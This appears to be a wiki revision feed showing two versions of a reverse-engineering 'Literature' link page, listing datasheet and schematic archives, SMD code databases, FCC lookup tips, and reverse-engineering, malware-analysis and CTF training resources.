==Education==

:[[:Literature|See the literature wiki page for all the resources.]]

Literature

2025-08-05T16:48:07Z

Polymorphic7: add macdat.net

Books, Journals, Magazines, Datasheets and all other literature related to reverse engineering is welcome here. The book pictured is the bound edition of a portion of the PDF's available in the PoC||GTFO section.[[File:POCorGTFO.jpg|thumb|<nowiki>Bound edition of PoC||GTFO, Proof of Concept OR Get The Fuck Out.</nowiki>]]

===Books and Magazines===
::[[PoCorGTFO|PoC||GTFO]] - International Journal of Proof-of-Concept or Get The Fuck Out (Mirror)

::[https://wiki.recessim.com/w/images/0/01/HackingTheXbox_Free.pdf Hacking the Xbox] - An Introduction to Reverse Engineering by Andrew "bunnie" Huang

::[https://nostarch.com/hardwarehackerpaperback The Hardware Hacker] - Manufacturing and Open Hardware by Andrew "bunnie" Huang

::[https://www.lehmanns.de/shop/mathematik-informatik/56052761-9781789619133-practical-hardware-pentesting Practical Hardware Pentesting] - A guide to attacking embedded systems and protecting them against the most common hardware attacks (ISBN 978-1-78961-913-3).

::[https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks Awesome-Cybersecurity-Handbooks] - Big collection of documents for cybersecurity & reverse engineering.

===Datasheets, boardviews, schematics, manuals===

====Generic (various fields)====

'''The curralated list below provides a wide range of useful websites offering resources regarding repair of wide range of electronic devices.'''

::[https://www.eserviceinfo.com/ e-service info] - Here you can find free datasheets, service manuals, schema, schematic diagrams and software downloads, service menu and mode information, code calculators for many brands of equipment. Search in all service docs that are OCR'd.

::[https://www.docin.com/ DOCin] - Chinese datasheet and other documents website

::[https://www.espec.ws/ espec.ws] - Russian site for people specializing in the repair and development of electronic equipment or who want to learn how to do it. Has a archive with datasheets and schematics.

::[https://www.badcaps.net/ Badcaps] - Badcaps Electronics Repair Forum & Schematic Search.

::[https://www.eserviceinfo.com/browse.php eServiceInfo] - Service manuals, schematics, documentation, programs, electronics, hobby ....

::[https://elektrotanya.com/keres Elektrotanya] - This site helps you to save the Earth from electronic waste! Schemetics, Service manuals, etc.

::[https://servlib.com/ ServLib] - The largest library of service manuals and schematics for Sony, Panasonic, Sharp, JBL. Repair information for electronics technicians. [https://github.com/AriZoneVibes/ServLibScrapper/ Scraper for ServLib].

::[https://www.freeservicemanuals.info FreeServiceManuals] - Free Service Manuals goal is to provide free schematics and (service) manuals for almost all brands of electronic devices.

::[http://www.nostatech.nl/ Nostatech] - Nostatech's Free Service Manuals goal is to provide free schematics and (service) manuals for almost all brands of electronic devices.

::[https://www.alldatasheet.com/ Alldatasheets] - Chinese datasheet database.

::[https://alltransistors.com/ All Transistors] - All Transistors Datasheet. Cross Reference Search. Transistor Database.

::[https://remont-aud.net/ Remont-aud] - Russian website offering a collection of schematics, datasheets and firmware dumps.

::[http://rom.by/ rom.by] - Russian website has verious rom dumps, datasheet and schematics

::[https://whycan.com whycan.com] - A Chinese embedded ARM development community offering a collection of schematics, SDKs for different platforms, datasheets, and firmware dumps.

::[https://www.s-manuals.com/ S-manuals.com] - Schematics, Service Manuals, ..

::[https://www.schematicsunlimited.com/ schematicsunlimited.com] - Download FREE diagrams, schematics, service manuals, operating manuals and other useful information for a variety of products.

====Portable computers, smartphones, videocards, printers, TVs====

'''The curralated list below provides a wide range of useful websites offering resources regarding repair of mostly smartphones, printers and laptops / notebooks.'''

::[https://vlab.su/ Vlab.su] - Russian virtual repair community. Virtual repair laboratory. Any problem can be solved together.

::[https://www.macdat.net/ macdat.net] - is a hobbyist-run website offering a detailed database of vintage laptop specs and Macintosh repair resources, including capacitor guides and service schematics.

::[https://www.electronica-pt.com/ Electrónica PT] - Portuguese community for basic and advanced electronics, electronic repair support center.

::[https://thetechstall.com/ The Tech Stall] - Download all the necessary tools for laptop and desktop motherboard diagnostics and fixes at no cost for free to reduce e-waste and spare the environment.

::[https://www.cyberforum.ru/notebook-circuit/ Cyberforum] - A Russian forum for programmers and system administrators also offering some schematics and boardview for repair.

::[https://zremcom.ru/scheme/scheme-laptops Zremcom] - A Russian website for repair, setup of servers, computers. Service manuals and diagrams for computers, laptops and power supplies.

::[https://www.alisaler.com/ AliSaler] - Website offering EC & Bios firmwares / bins, datasheets, boardviews, schematics, ic equivalent information, and programmer software for laptops.

::[https://www.alifixit.com/ AliFixit] - We believe in reviving technology and minimizing electronic waste. As our field is computers and laptops, we are here trying to provide as much stuff as possible for free to make our contribution.

::[https://www.indiafix.in/p/schematic-and-boardview-collection.html IndiaFix] - Free laptop schematic & boardviews downloads. Desktop bios dumps, and free repair tips.

::[https://www.apple-schematic.se/ Apple Schematic] - Free schematic and boardview (BRD) for Apple Macbooks and other Apple devices.

::[https://novoselovvlad.ru/ Novoselovvlad.ru] - Blog of the workshop of Vladislav Novoselov (offers schematics, bios dumps, and various other helpful tools).

::[http://printer1.blogspot.com/ printer1] - Collection of service manuals for printers and laptops.

::[https://www.tvservice.org/ TV Service] - is a Russian website offering datasheets and schematics for TV repair.

::[https://www.smarttvmanuals.net/ Smart Tv Manuals & Circuit Board Diagrams] - is a website offering datasheets and schematics for Smart TV repair.

::[https://www.informaticanapoli.it/manuali-di-servizio/ informaticanapoli] - Italian website that offers service manuals and schematics for various laptop brands.

::[https://www.gadget-manual.com/nvidia-geforce/ Gadget-Manual] - Graphic card manuals boardviews and datasheets.

::[https://sector.biz.ua/docs/schematic_diagrams_msi_motherboards/schematic_diagrams_msi_motherboards.phtml Sector] - Russian website offering schemetic diagrams, datasheets and boardviews (Asrock, Asus, ECS, Gigabyte, Acer, IBM/Lenovo).

::[https://schematic-x.blogspot.com/ Schematic-x] - Free laptops & desktop schematic diagrams and BIOS downloads.

::[https://www.s-manuals.com/notebook S-manuals.com] - Notebooks, Schematics, Service Manuals, ..

=====Laptop or smartphone Boardview / Schematic / Firmware [Groups]=====
::[https://t.me/schematicslaptop schematicslaptop] - Laptop schematics.

::[https://t.me/biosarchive biosarchive] - The largest channel of archived bios (firmwares) of laptops.

::[https://t.me/SMART_PHONE_SCHEMATICS SMART_PHONE_SCHEMATICS] - Colection of smartphone schematics.

=====Software for opening Boardview files=====

::[[Software_Tools#Tools_for_opening_CAD_or_Boardview_files|Tools for opening CAD or Boardview files.]]

====Retro PC Hardware====
::[https://theretroweb.com/ The Retro Web] - The Retro Web motherboard database, here you can find board photos, BIOS images, manuals and more!

::[https://soggi.org/ Soggi] - Retro hardware BIOS, firmware, drivers, manual, patches, tools, utilities, tech demos, other downloads and specifications available.

====Vintage Audio Equipment Schematics / Manuals====
::[https://hifigoteborg.se/pdf/ HiFiGoteborg] - LoudAndProud HiFi Goteborg. Schematic archive of old forgotten Hi-Fi from the golden days.

----

===SMD Marking Codes Database===

'''Due to the small size of most SMD components, manufacturers are not able to write the full part number on the case. They use instead a marking code typically composed of a combination of 2 or 3 letters or digits.''' 
'''When repairing an unknown electronic board, it becomes so difficult to know what is the exact type of a given component. This database allows to quickly find the part number of a SMD component when you have only the marking code.''' 

::[https://www.pcbcart.com/article/content/How-to-Identify-SMD-Components.html PCBCart] - How to Identify SMD Components Explained.

::[https://smd.yooneed.one/ smd.yooneed.one] - A searchable database of electronics SMD components marking codes.

::[https://embedeo.org/smd_codes/ embedeo.org/smd_codes] - SMD marking codes of electronic components such as bipolar transistors (BJT), field effect transistors (FET, MOSFET, JFET), diodes, Zener diodes, Schottky ..

::[https://repaircompanion.com/ RepairCompanion] - Your companion for electronics tools, component identification, calculators, diagnostics and education.

::[https://www.sos.sk/pdf/SMD_Catalog.pdf SOS electronic, The SMD CODEBOOK] - It lists well over 3,400 device codes in alphabetical order, together with type numbers, device characteristics or equivalents and pinout information.

::[http://www.marsport.org.uk/smd/mainframe.htm The SMD Codebook (marsport)] - Online version to look up a SMD codes.

::[https://www.s-manuals.com/smd S-manuals.com] - SMD Markings, SMD codes, ..

===IC Equivlent Database===

'''This might be useful if you run into a problem were you don't have a exact matching replacement part. Now you can use the cross reference search for an equivalent IC.'''

::[https://alltransistors.com/ All Transistors] - Datasheet. Cross Reference Search. Transistor Database.

::[https://octopart.com/ Octopart] - Lets you search for transistor datasheets but also allows you to filter by key specifications much like AllTransistors cross reference.

===Hardware pinouts (web-based)===

::[https://allpinouts.org/ allpinouts.org] - is a Web-based free content project to list cable and connectors pin-outs.

::[https://pinouts.ru/ pinouts.ru] - Handbook of hardware schemes, cables and connectors layouts pinouts.

----

===Find a image of the PCB without opening the device===
:# Modify the link below replace "example" without quotes with the product name and model you want to find
:# Visit the url and the results will show, if it does not show any results it has not been listed in the fccid database.
::<pre>https://www.google.com/search?tbm=isch&q=example+internal+site:fccid.io</pre>

::Note that there will be no results if the device does not have a wireless receiver or transmitter inside. Some have used a off-the-shelf (OTS) wireless radio to avoid having to do a new FCC certification. In that case it is useless material and time saving to first quickly image search the ID to check for this.
::[https://fccid.io/search.php FCCID.io search direct link]

====Electronic certification databases====
'''If the device is sold in the U.S. and complies with U.S. regulations, see below.''' 
An FCC ID is a unique identifier assigned to a device registered with the United States Federal Communications Commission. 
For legal sale of wireless devices in the US.
These databases can be of great use if you want to quickly know what kind of wireless communication hardware is used. 
Here you can most often find certifications, type approvals, specifications, instructions, internal/external pictures and sometimes even datasheets.

::* FCC.Report. Provides this easily searchable FCC ID database.
:::: [https://fcc.report/FCC-ID/ -> FCC.Report]
::* Device.report. Electronics device database of over 500,000 products with certifications, type approvals, specifications, instructions, and datasheets.
:::: [https://device.report/ -> Device.Report]

----

===Digital Education===
:Resources for reverse engineering closed-source software to identify bugs, debug, and conduct penetration testing.

====Reverse Engineering Guides====
:Tools are great, and sometimes free! Without knowing how to use them, they can be a big waste of time. Better to spend your time learning the basics, then apply your knowledge.

::[http://security.cs.rpi.edu/courses/hwre-spring2014/ CSCI 4974 / 6974 Hardware Reverse Engineering] - Good slide decks on reverse engineering hardware at all levels, IC to PCB.

::[https://github.com/mytechnotalent/Reverse-Engineering-Tutorial Reverse Engineering Tutorial] - A comprehensive reverse engineering tutorial covering x86, x64, 32-bit ARM & 64-bit ARM architectures.

=====Ghidra Documents=====
'''Class material linked from ghidra.re. Use arrow keys on keyboard to move through slides.'''
======Beginner======
::[https://ghidra.re/ghidra_docs/GhidraClass/Beginner/Introduction_to_Ghidra_Student_Guide.html Introduction to Ghidra Student Guide.]
======Intermediate======
::[https://ghidra.re/ghidra_docs/GhidraClass/Intermediate/Intermediate_Ghidra_Student_Guide.html Intermediate to Ghidra Student Guide.]
======Advanced (PDF)======
::[https://ghidra.re/ghidra_docs/GhidraClass/Advanced/improvingDisassemblyAndDecompilation.pdf Advanced (PDF).]
======Advanced Development======
::[https://ghidra.re/ghidra_docs/GhidraClass/AdvancedDevelopment/GhidraAdvancedDevelopment.html Advanced Development.]
======Debugger======
::[https://ghidra.re/ghidra_docs/GhidraClass/Debugger/README.html Debugger.]
======BSim======
::[https://ghidra.re/ghidra_docs/GhidraClass/BSim/README.html BSim.]

=====IDA Material=====

::[[File:Reverse Engineering Malware IDA & Olly Basics 5 parts by otw v1.pdf|thumb]] - A Reverse Engineering Malware introduction and bare basics IDA & Olly x86 (5 parts) by otw.

::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-1/ Using IDAPython to Make Your Life Easier: Part 1] - As a malware reverse engineer, I often find myself using IDA Pro in my day-to-day activities. It should come as no surprise, seeing as IDA Pro is the industry standard (although alternatives such as radare2 and Hopper are gaining traction). One of the more powerful features of IDA that I implore all reverse engineers to make use of is the Python addition, aptly named ‘IDAPython’, which exposes a large number of IDA API calls.

:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-2/ Using IDAPython to Make Your Life Easier: Part 2]

:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-3/ Using IDAPython to Make Your Life Easier: Part 3]

:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-4/ Using IDAPython to Make Your Life Easier: Part 4]

:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-5/ Using IDAPython to Make Your Life Easier: Part 5]

::[https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering Some publicly available Malware analysis and Reverse engineering] - is a curated list of awesome materials from the user Dump-GUY a former Forensic, Malware Analyst, Reverse Engineer. [https://www.youtube.com/c/DuMpGuYTrIcKsTeR Youtube channel].

=====x64dbg=====

::[https://help.x64dbg.com/en/latest/introduction/index.html x64dbg] - Introduction & documentation page.

=====Immunity Debugger=====

::[https://class.malware.re/stuff/nardella/basic-reverse-engineering-immunity-debugger-36982.pdf Basic Reverse Engineering with Immunity Debugger] - SANS Institute Information Security Reading Room. Basic Reverse Engineering x86 with Immunity Debugger.

=====Malware Reverse Engineering=====

::[https://tryhackme.com/room/basicmalwarere BasicMalwareRE] - this room aims towards helping everyone learn about the basics of "Malware Reverse Engineering".

::[https://gist.github.com/IdanBanani/5be0442ad390f89259b494098f450bfd Reversing / Malware Analysis / Assembly -resources] - is a large list of reversing materials and courses.

::[https://github.com/CyberSecurityUP/Awesome-Malware-and-Reverse-Engineering Malware and Reverse Engineering Complete Collection] - Awesome Malware and Reverse Engineering collection by Joas.

=====Anti Debugging Protection Techniques with Examples=====
======x86 (Win32)======

::[https://anti-debug.checkpoint.com/ cp<r> Anti-Debug Tricks] - By Check Point Research: CPR, x86 & x64.

::[https://www.apriorit.com/dev-blog/367-anti-reverse-engineering-protection-techniques-to-use-before-releasing-software Anti Debugging Protection Techniques with Examples] - A lot of great examples provided by apriorit on their blog, x86 & x64.

::[https://www.codeproject.com/Articles/30815/An-Anti-Reverse-Engineering-Guide An-Anti-Reverse-Engineering-Guide] - By Joshua Tully hosted on CodeProject, Win32/x86 with examples.

::[https://www.openrce.org/reference_library/anti_reversing OpenRCE Anti Reversing Database] - Mostly if not all Win32/x86. The Anti Reverse Engineering Database provides the analysis and desription for a number of various anti debugging, disassembly and dumping tricks. This resource aims to help reverse engineers locate, identify and bypass such techniques.

::[[Media:The “Ultimate” Anti-Debugging.pdf]] - by Peter Ferrie (4 May 2011). This text contains a number of code snippets in both 32-bit and 64-bit versions.

::[[Media:Anti-reverse engineering techniques by Jozef Miljak.pdf]] - An experimental study on which anti-reverse engineering technique are the most effective to protect your software from reversers, Win32/x86.

::[https://forum.tuts4you.com/files/file/1218-anti-reverse-engineering-guide/ Anti-Reverse Engineering Guide By Teddy Rogers] - An individual reading this should have a solid understanding of ASM, how computers handle memory, the Win32 Debugging API, and at least some knowledge of Windows internals.

======x64 (Win64)======

::[https://anti-debug.checkpoint.com/ cp<r> Anti-Debug Tricks] - By Check Point Research: CPR, x86 & x64.

::[https://www.apriorit.com/dev-blog/367-anti-reverse-engineering-protection-techniques-to-use-before-releasing-software Anti Debugging Protection Techniques with Examples] - A lot of great examples provided by apriorit on their blog, x86 & x64.

::[[Media:The “Ultimate” Anti-Debugging.pdf]] - by Peter Ferrie (4 May 2011). This text contains a number of code snippets in both 32-bit and 64-bit versions.

====Machine code or virtual machine bytecode reference====

=====Assembly reference / manuals=====

======x86======

::[http://ref.x86asm.net/ Reference x86] - Reference X86 Opcode and Instructions (the holy x86 assembly bible).

======x86 Training======
::[https://x86re.com/1.html Reverse Engineering for Noobs Part 1] - Brief introduction to RE, executables, compiling, 32-bit x86 syntax, and stack frames.

::[https://x86re.com/2.html Reverse Engineering for Noobs Part 2: Portable Executable Files] - Breakdown of Portable Executable image file headers and sections.

======x86 and amd64======

::[https://www.felixcloutier.com/x86/ x86 and amd64 instruction reference] - Derived from the December 2023 version of the Intel® 64 and IA-32 Architectures Software Developer's Manual.

=====Bytecode reference=====
======Java Virtual Machine (JVM)======

::[https://en.wikipedia.org/wiki/List_of_Java_bytecode_instructions Wikipedia] - List of Java bytecode instructions.

::[https://javaalmanac.io/bytecode/ The Java Version Almanac] - Java Bytecode, by Mnemonic.

======Dalvik opcodes (Android)======

::[http://pallergabor.uw.hu/androidblog/dalvik_opcodes.html Pallergabor] - Dalvik opcodes documentation with examples.

::[https://github.com/user1342/Awesome-Android-Reverse-Engineering Awesome-Android-Reverse-Engineering] - A curated list of awesome Android Reverse Engineering training, resources, and tools.

======Common Language Runtime (CLR) .NET======

::[https://en.wikipedia.org/wiki/List_of_CIL_instructions Wikipedia] - List of CIL instructions.

::[https://github.com/stakx/ecma-335/blob/master/docs/TABLE_OF_CONTENTS.md ECMA-335 Documentation] - This Standard defines the Common Language Infrastructure (CLI).

====Reverse Engineering Challenges====

::[https://crackmes.one/ Crackmes.one] - is a simple place where you can download crackmes to improve your reverse engineering skills.

::[https://crackmy.app/ CrackMy.App] - is as place to share your crackmes, solve challenges, and climb the leaderboard in the ultimate reverse engineering community.

====Security Training Classes====

::[https://ost2.fyi/ OpenSecurityTraining2] - is a free, beta-stage online platform built on Open edX that offers in-depth cybersecurity and reverse-engineering courses like x86 assembly, kernel exploitation, and firmware analysis.

====Security CTF====
Capture the Flag (CTF) in computer security is an exercise in which participants attempt to find text strings, called "flags", which are secretly hidden in purposefully vulnerable programs or websites. 
Learn more about reverse engineering and cybersecurity start playing CTF's.

::[https://jaimelightfoot.com/blog/so-you-want-to-ctf-a-beginners-guide/ CTF Beginners Guide] - is intended to be a guide for beginners who have just started playing CTFs (or for people who have never played, but would like to).

::[https://ctflearn.com/ CTFlearn] - The most beginner-friendly way to get into hacking. Challenges Test your skills by hacking your way through hundreds of challenges.

::[https://ctf101.org/ CTF101] - a site documenting the basics of playing Capture the Flags. This guide was written and maintained by the OSIRIS Lab at New York University.

::[https://picoctf.org/ picoCTF] - is a free computer security education program with original content built on a capture-the-flag framework created by security and privacy experts.

::[https://microcorruption.com/ MicroCorruption] - is a online, embedded debugger that starts from scratch and introduces the very foundations of memory corruption. Great practice for learning the basics of binary exploitation.

::[https://echoctf.red/ echoctf.red] - A platform to develop, run and administer CTF competitions. The online echoCTF.RED platform user interfaces and codebase.

::[https://pwnable.kr/ Wargames Pwnable.kr] - is a non-commercial wargame site which provides various pwn challenges regarding system exploitation, including reverse engineering, web exploitation, and cryptography.

::[https://pwnable.tw/challenge/ Wargames Pwnable.tw] - is a wargame site for hackers to test and expand their binary exploiting skills. HOW-TO. Try to find out the vulnerabilities exists.

::[https://ctfsites.github.io/ More CTF sites] - A curated list of more CTF sites on Github.

====Embedded security Challenge (ESC)====

::[https://github.com/TrustworthyComputing/csaw_esc_2024 csaw_esc_2024] - CSAW 2024 Embedded Security Challenge (Github repo).

::[https://github.com/TrustworthyComputing/csaw_esc_2023 csaw_esc_2023] - CSAW 2023 Embedded Security Challenge (Github repo).

::[https://github.com/TrustworthyComputing/csaw_esc_2022 csaw_esc_2022] - CSAW 2022 Embedded Security Challenge (Github repo).

::[https://github.com/TrustworthyComputing/csaw_esc_2021 csaw_esc_2021] - CSAW 2021 Embedded Security Challenge (Github repo).

::[https://github.com/TrustworthyComputing/csaw_esc_2019 csaw_esc_2019] - CSAW 2019 Embedded Security Challenge (Github repo).

====800 MHz AMPS Documentation====
::[https://wiki.recessim.com/w/images/8/86/Cellular_Telephone_Bible_With_SIDs.txt The Cellular Telephone Bible by Mike Larsen (1997)] Unlock codes and programming procedures of early 800 MHz analog AMPS cellular phones. This document also contains the system IDs (SID) of the 800 MHz analog service providers.

Literature

2025-08-05T16:25:38Z

Polymorphic7: add schematicsunlimited.com

Books, Journals, Magazines, Datasheets and all other literature related to reverse engineering is welcome here. The book pictured is the bound edition of a portion of the PDF's available in the PoC||GTFO section.[[File:POCorGTFO.jpg|thumb|<nowiki>Bound edition of PoC||GTFO, Proof of Concept OR Get The Fuck Out.</nowiki>]]

===Books and Magazines===
::[[PoCorGTFO|PoC||GTFO]] - International Journal of Proof-of-Concept or Get The Fuck Out (Mirror)

::[https://wiki.recessim.com/w/images/0/01/HackingTheXbox_Free.pdf Hacking the Xbox] - An Introduction to Reverse Engineering by Andrew "bunnie" Huang

::[https://nostarch.com/hardwarehackerpaperback The Hardware Hacker] - Manufacturing and Open Hardware by Andrew "bunnie" Huang

::[https://www.lehmanns.de/shop/mathematik-informatik/56052761-9781789619133-practical-hardware-pentesting Practical Hardware Pentesting] - A guide to attacking embedded systems and protecting them against the most common hardware attacks (ISBN 978-1-78961-913-3).

::[https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks Awesome-Cybersecurity-Handbooks] - Big collection of documents for cybersecurity & reverse engineering.

===Datasheets, boardviews, schematics, manuals===

====Generic (various fields)====

'''The curralated list below provides a wide range of useful websites offering resources regarding repair of wide range of electronic devices.'''

::[https://www.eserviceinfo.com/ e-service info] - Here you can find free datasheets, service manuals, schema, schematic diagrams and software downloads, service menu and mode information, code calculators for many brands of equipment. Search in all service docs that are OCR'd.

::[https://www.docin.com/ DOCin] - Chinese datasheet and other documents website

::[https://www.espec.ws/ espec.ws] - Russian site for people specializing in the repair and development of electronic equipment or who want to learn how to do it. Has a archive with datasheets and schematics.

::[https://www.badcaps.net/ Badcaps] - Badcaps Electronics Repair Forum & Schematic Search.

::[https://www.eserviceinfo.com/browse.php eServiceInfo] - Service manuals, schematics, documentation, programs, electronics, hobby ....

::[https://elektrotanya.com/keres Elektrotanya] - This site helps you to save the Earth from electronic waste! Schemetics, Service manuals, etc.

::[https://servlib.com/ ServLib] - The largest library of service manuals and schematics for Sony, Panasonic, Sharp, JBL. Repair information for electronics technicians. [https://github.com/AriZoneVibes/ServLibScrapper/ Scraper for ServLib].

::[https://www.freeservicemanuals.info FreeServiceManuals] - Free Service Manuals goal is to provide free schematics and (service) manuals for almost all brands of electronic devices.

::[http://www.nostatech.nl/ Nostatech] - Nostatech's Free Service Manuals goal is to provide free schematics and (service) manuals for almost all brands of electronic devices.

::[https://www.alldatasheet.com/ Alldatasheets] - Chinese datasheet database.

::[https://alltransistors.com/ All Transistors] - All Transistors Datasheet. Cross Reference Search. Transistor Database.

::[https://remont-aud.net/ Remont-aud] - Russian website offering a collection of schematics, datasheets and firmware dumps.

::[http://rom.by/ rom.by] - Russian website has verious rom dumps, datasheet and schematics

::[https://whycan.com whycan.com] - A Chinese embedded ARM development community offering a collection of schematics, SDKs for different platforms, datasheets, and firmware dumps.

::[https://www.s-manuals.com/ S-manuals.com] - Schematics, Service Manuals, ..

::[https://www.schematicsunlimited.com/ schematicsunlimited.com] - Download FREE diagrams, schematics, service manuals, operating manuals and other useful information for a variety of products.

====Portable computers, smartphones, videocards, printers, TVs====

'''The curralated list below provides a wide range of useful websites offering resources regarding repair of mostly smartphones, printers and laptops / notebooks.'''

::[https://vlab.su/ Vlab.su] - Russian virtual repair community. Virtual repair laboratory. Any problem can be solved together.

::[https://www.electronica-pt.com/ Electrónica PT] - Portuguese community for basic and advanced electronics, electronic repair support center.

::[https://thetechstall.com/ The Tech Stall] - Download all the necessary tools for laptop and desktop motherboard diagnostics and fixes at no cost for free to reduce e-waste and spare the environment.

::[https://www.cyberforum.ru/notebook-circuit/ Cyberforum] - A Russian forum for programmers and system administrators also offering some schematics and boardview for repair.

::[https://zremcom.ru/scheme/scheme-laptops Zremcom] - A Russian website for repair, setup of servers, computers. Service manuals and diagrams for computers, laptops and power supplies.

::[https://www.alisaler.com/ AliSaler] - Website offering EC & Bios firmwares / bins, datasheets, boardviews, schematics, ic equivalent information, and programmer software for laptops.

::[https://www.alifixit.com/ AliFixit] - We believe in reviving technology and minimizing electronic waste. As our field is computers and laptops, we are here trying to provide as much stuff as possible for free to make our contribution.

::[https://www.indiafix.in/p/schematic-and-boardview-collection.html IndiaFix] - Free laptop schematic & boardviews downloads. Desktop bios dumps, and free repair tips.

::[https://www.apple-schematic.se/ Apple Schematic] - Free schematic and boardview (BRD) for Apple Macbooks and other Apple devices.

::[https://novoselovvlad.ru/ Novoselovvlad.ru] - Blog of the workshop of Vladislav Novoselov (offers schematics, bios dumps, and various other helpful tools).

::[http://printer1.blogspot.com/ printer1] - Collection of service manuals for printers and laptops.

::[https://www.tvservice.org/ TV Service] - is a Russian website offering datasheets and schematics for TV repair.

::[https://www.smarttvmanuals.net/ Smart Tv Manuals & Circuit Board Diagrams] - is a website offering datasheets and schematics for Smart TV repair.

::[https://www.informaticanapoli.it/manuali-di-servizio/ informaticanapoli] - Italian website that offers service manuals and schematics for various laptop brands.

::[https://www.gadget-manual.com/nvidia-geforce/ Gadget-Manual] - Graphic card manuals boardviews and datasheets.

::[https://sector.biz.ua/docs/schematic_diagrams_msi_motherboards/schematic_diagrams_msi_motherboards.phtml Sector] - Russian website offering schemetic diagrams, datasheets and boardviews (Asrock, Asus, ECS, Gigabyte, Acer, IBM/Lenovo).

::[https://schematic-x.blogspot.com/ Schematic-x] - Free laptops & desktop schematic diagrams and BIOS downloads.

::[https://www.s-manuals.com/notebook S-manuals.com] - Notebooks, Schematics, Service Manuals, ..

=====Laptop or smartphone Boardview / Schematic / Firmware [Groups]=====
::[https://t.me/schematicslaptop schematicslaptop] - Laptop schematics.

::[https://t.me/biosarchive biosarchive] - The largest channel of archived bios (firmwares) of laptops.

::[https://t.me/SMART_PHONE_SCHEMATICS SMART_PHONE_SCHEMATICS] - Colection of smartphone schematics.

=====Software for opening Boardview files=====

::[[Software_Tools#Tools_for_opening_CAD_or_Boardview_files|Tools for opening CAD or Boardview files.]]

====Retro PC Hardware====
::[https://theretroweb.com/ The Retro Web] - The Retro Web motherboard database, here you can find board photos, BIOS images, manuals and more!

::[https://soggi.org/ Soggi] - Retro hardware BIOS, firmware, drivers, manual, patches, tools, utilities, tech demos, other downloads and specifications available.

====Vintage Audio Equipment Schematics / Manuals====
::[https://hifigoteborg.se/pdf/ HiFiGoteborg] - LoudAndProud HiFi Goteborg. Schematic archive of old forgotten Hi-Fi from the golden days.

----

===SMD Marking Codes Database===

'''Due to the small size of most SMD components, manufacturers are not able to write the full part number on the case. They use instead a marking code typically composed of a combination of 2 or 3 letters or digits.''' 
'''When repairing an unknown electronic board, it becomes so difficult to know what is the exact type of a given component. This database allows to quickly find the part number of a SMD component when you have only the marking code.''' 

::[https://www.pcbcart.com/article/content/How-to-Identify-SMD-Components.html PCBCart] - How to Identify SMD Components Explained.

::[https://smd.yooneed.one/ smd.yooneed.one] - A searchable database of electronics SMD components marking codes.

::[https://embedeo.org/smd_codes/ embedeo.org/smd_codes] - SMD marking codes of electronic components such as bipolar transistors (BJT), field effect transistors (FET, MOSFET, JFET), diodes, Zener diodes, Schottky ..

::[https://repaircompanion.com/ RepairCompanion] - Your companion for electronics tools, component identification, calculators, diagnostics and education.

::[https://www.sos.sk/pdf/SMD_Catalog.pdf SOS electronic, The SMD CODEBOOK] - It lists well over 3,400 device codes in alphabetical order, together with type numbers, device characteristics or equivalents and pinout information.

::[http://www.marsport.org.uk/smd/mainframe.htm The SMD Codebook (marsport)] - Online version to look up a SMD codes.

::[https://www.s-manuals.com/smd S-manuals.com] - SMD Markings, SMD codes, ..

===IC Equivlent Database===

'''This might be useful if you run into a problem were you don't have a exact matching replacement part. Now you can use the cross reference search for an equivalent IC.'''

::[https://alltransistors.com/ All Transistors] - Datasheet. Cross Reference Search. Transistor Database.

::[https://octopart.com/ Octopart] - Lets you search for transistor datasheets but also allows you to filter by key specifications much like AllTransistors cross reference.

===Hardware pinouts (web-based)===

::[https://allpinouts.org/ allpinouts.org] - is a Web-based free content project to list cable and connectors pin-outs.

::[https://pinouts.ru/ pinouts.ru] - Handbook of hardware schemes, cables and connectors layouts pinouts.

----

===Find a image of the PCB without opening the device===
:# Modify the link below replace "example" without quotes with the product name and model you want to find
:# Visit the url and the results will show, if it does not show any results it has not been listed in the fccid database.
::<pre>https://www.google.com/search?tbm=isch&q=example+internal+site:fccid.io</pre>

::Note that there will be no results if the device does not have a wireless receiver or transmitter inside. Some have used a off-the-shelf (OTS) wireless radio to avoid having to do a new FCC certification. In that case it is useless material and time saving to first quickly image search the ID to check for this.
::[https://fccid.io/search.php FCCID.io search direct link]

====Electronic certification databases====
'''If the device is sold in the U.S. and complies with U.S. regulations, see below.''' 
An FCC ID is a unique identifier assigned to a device registered with the United States Federal Communications Commission. 
For legal sale of wireless devices in the US.
These databases can be of great use if you want to quickly know what kind of wireless communication hardware is used. 
Here you can most often find certifications, type approvals, specifications, instructions, internal/external pictures and sometimes even datasheets.

::* FCC.Report. Provides this easily searchable FCC ID database.
:::: [https://fcc.report/FCC-ID/ -> FCC.Report]
::* Device.report. Electronics device database of over 500,000 products with certifications, type approvals, specifications, instructions, and datasheets.
:::: [https://device.report/ -> Device.Report]

----

===Digital Education===
:Resources for reverse engineering closed-source software to identify bugs, debug, and conduct penetration testing.

====Reverse Engineering Guides====
:Tools are great, and sometimes free! Without knowing how to use them, they can be a big waste of time. Better to spend your time learning the basics, then apply your knowledge.

::[http://security.cs.rpi.edu/courses/hwre-spring2014/ CSCI 4974 / 6974 Hardware Reverse Engineering] - Good slide decks on reverse engineering hardware at all levels, IC to PCB.

::[https://github.com/mytechnotalent/Reverse-Engineering-Tutorial Reverse Engineering Tutorial] - A comprehensive reverse engineering tutorial covering x86, x64, 32-bit ARM & 64-bit ARM architectures.

=====Ghidra Documents=====
'''Class material linked from ghidra.re. Use arrow keys on keyboard to move through slides.'''
======Beginner======
::[https://ghidra.re/ghidra_docs/GhidraClass/Beginner/Introduction_to_Ghidra_Student_Guide.html Introduction to Ghidra Student Guide.]
======Intermediate======
::[https://ghidra.re/ghidra_docs/GhidraClass/Intermediate/Intermediate_Ghidra_Student_Guide.html Intermediate to Ghidra Student Guide.]
======Advanced (PDF)======
::[https://ghidra.re/ghidra_docs/GhidraClass/Advanced/improvingDisassemblyAndDecompilation.pdf Advanced (PDF).]
======Advanced Development======
::[https://ghidra.re/ghidra_docs/GhidraClass/AdvancedDevelopment/GhidraAdvancedDevelopment.html Advanced Development.]
======Debugger======
::[https://ghidra.re/ghidra_docs/GhidraClass/Debugger/README.html Debugger.]
======BSim======
